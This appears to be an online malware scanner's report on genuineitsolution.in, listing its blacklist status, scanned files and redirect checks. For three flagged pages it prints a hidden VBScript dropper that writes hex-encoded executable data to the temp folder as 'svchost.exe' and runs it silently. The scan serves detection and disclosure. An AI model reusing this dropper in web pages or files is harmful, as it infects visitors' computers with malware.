Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=genuineitsolution.in
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://genuineitsolution.in/ | 200 OK Content-Length: 186266 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000DC9325F798F24BA498F24BA498F24BA45BFD44A499F24BA498F24AA4B7F34BA45BFD16A493F24BA427FD2BA49AF24BA45BFD14A49FF24BA45BFD17A499F24BA45BFD15A499F24BA45BFD2BA4A7F24BA45BFD11A499F24BA45269636898 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://genuineitsolution.in/js/ga.js | 200 OK Content-Length: 37362 Content-Type: application/javascript | clean |
http://genuineitsolution.in/js/home.js | 200 OK Content-Length: 41497 Content-Type: application/javascript | clean |
http://genuineitsolution.in/js/jquery.min.js | 200 OK Content-Length: 93868 Content-Type: application/javascript | clean |
http://genuineitsolution.in/index.html | 200 OK Content-Length: 186266 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000DC9325F798F24BA498F24BA498F24BA45BFD44A499F24BA498F24AA4B7F34BA45BFD16A493F24BA427FD2BA49AF24BA45BFD14A49FF24BA45BFD17A499F24BA45BFD15A499F24BA45BFD2BA4A7F24BA45BFD11A499F24BA45269636898 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://genuineitsolution.in/innovative.html | 200 OK Content-Length: 180745 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000DC9325F798F24BA498F24BA498F24BA45BFD44A499F24BA498F24AA4B7F34BA45BFD16A493F24BA427FD2BA49AF24BA45BFD14A49FF24BA45BFD17A499F24BA45BFD15A499F24BA45BFD2BA4A7F24BA45BFD11A499F24BA45269636898 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://genuineitsolution.in/js/innavative.js | 200 OK Content-Length: 877 Content-Type: application/javascript | clean |
http://genuineitsolution.in/js/brand.js | 200 OK Content-Length: 32461 Content-Type: application/javascript | clean |
http://genuineitsolution.in//ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js/ | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://suspended.hostgator.com/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
http://genuineitsolution.in/test404page.js | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://genuineitsolution.in/js/innovate.js | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://genuineitsolution.in/js/ | 200 OK Content-Length: 495 Content-Type: text/html | clean |
http://genuineitsolution.in/js/brands.js | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: genuineitsolution.in
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 18 Dec 2014 17:11:12 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 186266
Content-Type: text/html
Last-Modified: Tue, 18 Nov 2014 06:00:15 GMT
...186266 bytes of data.
GET / HTTP/1.1
Host: genuineitsolution.in
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 18 Dec 2014 17:11:12 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 186266
Content-Type: text/html
Last-Modified: Tue, 18 Nov 2014 06:00:15 GMT
...186266 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: genuineitsolution.in
Referer: http://www.google.com/search?q=genuineitsolution.in
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: genuineitsolution.in
Referer: http://www.google.com/search?q=genuineitsolution.in
Result:
The result is similar to the first query. There are no suspicious redirects found.